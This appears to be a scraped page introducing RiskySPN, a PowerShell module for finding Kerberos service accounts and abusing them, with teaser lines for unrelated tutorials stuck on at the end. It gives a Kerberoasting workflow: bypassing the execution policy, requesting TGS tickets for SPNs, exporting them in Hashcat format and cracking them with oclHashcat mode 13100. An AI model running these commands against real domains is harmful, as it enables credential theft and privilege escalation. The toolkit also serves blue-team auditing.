RiskySPN is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Name). This module can assist blue teams to identify potentially risky SPNs as well as red teams to escalate privileges by leveraging Kerberos and Active Directory.
Import-Module .\RiskySPNs.psm1 IEX from the web). .\Find-PotentiallyCrackableAccounts.ps1 Make sure Set-ExecutionPolicy is Unrestricted or Bypass
Get-Help Get-TGSCipher -Full All functions also have the -Verbosemode
Find-PotentiallyCrackableAccounts Sensitive + RC4 = $$$
Export-PotentiallyCrackableAccounts Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433" Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3 Apache Tomcat is an open-source Java application server that implements the Java Servlet, JavaServer Pages, and…
Setting the correct timezone on your Ubuntu machine is more important than it sounds. Your…
PrestaShop is a free, open-source e-commerce platform built with PHP and MySQL. It comes with a…
SSH keys give you a more secure and convenient way to connect to remote servers. Instead…
FFmpeg is a free, open-source command-line tool for working with multimedia files. It can convert video…
Nginx server blocks let you run more than one website on a single server. Each block…